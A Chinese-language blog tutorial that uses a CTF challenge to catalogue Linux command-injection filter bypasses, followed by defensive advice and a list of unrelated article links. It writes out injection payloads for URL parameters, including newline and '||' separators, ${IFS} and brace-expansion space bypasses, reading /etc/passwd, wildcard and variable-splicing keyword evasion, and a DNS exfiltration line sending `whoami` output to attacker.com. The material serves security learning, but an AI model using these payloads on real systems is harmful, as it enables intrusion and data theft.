当前位置: 首页 > news >正文

从一道CTF题看Linux命令注入的N种绕过姿势:不只是空格和cat

从一道CTF题看Linux命令注入的N种绕过姿势:不只是空格和cat

在渗透测试和CTF竞赛中,命令注入漏洞一直是Web安全领域的重要考点。不同于简单的SQL注入或XSS攻击,命令注入直接与操作系统交互,其危害性和灵活性都更为显著。本文将以一道典型的CTF题目为切入点,系统性地剖析Linux命令注入的各种高级绕过技术,帮助安全从业者构建更全面的防御思维。

1. 命令分隔符的七十二变

当我们在Web应用中发现了命令注入漏洞时,第一个需要突破的往往是如何将多个命令串联执行。常见的分号;可能被过滤,但Linux系统提供了丰富的替代方案:

  • 逻辑运算符&&(前命令成功则执行后命令)、||(前命令失败则执行后命令)
  • 后台执行符&将前命令放入后台执行,继续执行后命令
  • 管道符|将前命令输出作为后命令输入
  • 换行符%0a(URL编码的换行符)在HTTP请求中常能绕过过滤
# 实际CTF中的利用示例 ?ip=127.0.0.1%0aid # 使用换行符代替分号 ?ip=127.0.0.1||ls # 前ping命令失败时执行ls

注意:不同分隔符在Bash中的执行优先级不同,&&||具有相同的优先级,且高于;&

2. 空格绕过的艺术

空格是命令注入中最常被过滤的字符之一,但绕过方法远不止IFS一种:

绕过技术示例原理说明
IFS变量cat${IFS}file使用内部字段分隔符
重定向符cat<file利用输入重定向
大括号扩展{cat,file}Bash的大括号扩展语法
制表符cat\tfile使用Tab替代空格
URL编码cat%09file编码后的空格或制表符
# 使用大括号扩展绕过 ?ip=127.0.0.1;{ls,-la} # 使用重定向符 ?ip=127.0.0.1;cat</etc/passwd

3. 关键字黑名单的破解之道

catflag等关键词被过滤时,我们可以采用多种替代方案:

3.1 替代命令法

  • 文件读取:tacrevmorelessheadtailnl
  • 二进制查看:odxxdhexdump
  • 编码转换:base64uuencode

3.2 通配符技巧

# 使用通配符匹配文件名 ?ip=127.0.0.1;cat /fla? # 使用字符类 ?ip=127.0.0.1;cat /fla[a-g]

3.3 变量拼接

# 将命令拆分为变量 ?ip=127.0.0.1;a=c;b=at;c=flag;$a$b $c

4. 无回显场景下的盲注技术

当命令执行结果不直接显示时,可以采用以下技术:

  • 时间盲注:通过sleep命令观察响应延迟
  • DNS外带:利用dignslookup将数据外带
  • HTTP请求:使用curlwget发送数据到可控服务器
  • 文件写入:将结果写入web目录再访问
# DNS外带示例 ?ip=127.0.0.1;dig `whoami`.attacker.com # 时间盲注示例 ?ip=127.0.0.1;if [ -f /flag ]; then sleep 5; fi

5. 防御措施的全面思考

了解攻击手法是为了更好地防御。针对命令注入,建议采取多层防护:

  1. 输入验证:严格限制用户输入的字符集
  2. 参数化调用:使用execve等函数直接传递参数数组
  3. 最小权限:运行Web服务的用户应具有最小必要权限
  4. 命令白名单:如必须执行命令,应建立严格的命令白名单
# 安全的命令执行示例(Python) import subprocess subprocess.run(['ls', '-l'], check=True) # 避免shell=True

在实际渗透测试中,命令注入的绕过往往需要多种技术组合使用。我曾遇到一个案例,目标系统过滤了空格、分号和常见命令,最终通过%0a换行符配合大括号扩展成功实现了注入。这种不断突破限制的过程,正是安全研究的魅力所在。

http://www.gsyq.cn/news/1438469.html

相关文章:

  • Unity项目资源管理避坑:Resources.Load用对了没?小心打包后图片消失!
  • Spring Boot 2.5.4项目里,Swagger 3.0集成knife4j后,如何优雅地给所有接口自动加上Token请求头?
  • PyCharm新手必看:解决‘pip不是命令’报错的3种方法(附Anaconda环境配置)
  • 告别死记硬背:用Python+Wireshark抓包实战解析NR C-DRX Inactivity Timer
  • 从RAW、WAR到WAW:图解Tomasulo算法如何化解CPU指令冲突
  • 如何永久保存微信聊天记录:WeChatMsg完整指南与实用教程
  • 元宝 LeetCode 2902. 和带限制的子多重集合的数目 Java实现
  • 元宝 LeetCode 2902. 和带限制的子多重集合的数目 Python3实现
  • 区块链+物联网构建环境价值互联网:机器自主交易绿电与碳资产
  • AMD SEV实战:在KVM/QEMU上快速搭建你的第一个机密虚拟机(含密钥管理避坑指南)
  • 构建面向AI的现代数据湖:从架构原则到硬件选型实战
  • AI Agent Harness冷启动优化:快速响应方案
  • 医疗设备安规入门:一张图搞懂BF型设备的MOOP/MOPP绝缘路径(附GB 9706.1附录解析)
  • 从布尔表达式到可综合代码:一个全加器的Verilog RTL设计完整流程(附代码规范检查清单)
  • 从DDR到DDR5:Burst和Prefetch的演变如何决定了内存性能的飞跃
  • DIY土壤湿度传感器:从腐蚀铜板到Arduino读取的完整指南
  • 量子策略评估(QPE)原理与强化学习应用
  • 别再只用if了!用np.all()和np.any()让你的NumPy数据清洗效率翻倍
  • Nacos 2.x 本地联调踩坑记:解决 gRPC 端口偏移导致的 StatusRuntimeException
  • 从呼吸到电能:DIY口罩发电项目详解与能量收集技术实践
  • 基于Arduino与步进/伺服电机的低成本物理开关自动化方案
  • AI时代人类转型:从执行者到策展人与教练的核心能力重构
  • AI营销实战指南:从用户画像到智能投放的完整落地路径
  • CRAFT框架:大模型驱动的多机器人协作训练方案
  • GPT模型技术本质与AGI鸿沟:从Transformer到通用人工智能的路径分析
  • 别再手动敲字了!用Python+Tesseract批量提取图片文字,5分钟搞定文档电子化
  • 量子信息流安全:SPO-QPN框架下的并发系统不透明性验证与策略强制执行
  • AI诗歌创作实验:从提示词工程到人机协作的实践指南
  • 用Python和PySAL搞定空间数据分析:手把手教你绘制乔治亚州教育不平等热点图
  • 别再对着真机发愁了!用华为eNSP从零搭建你的第一个企业网实验环境(附拓扑文件)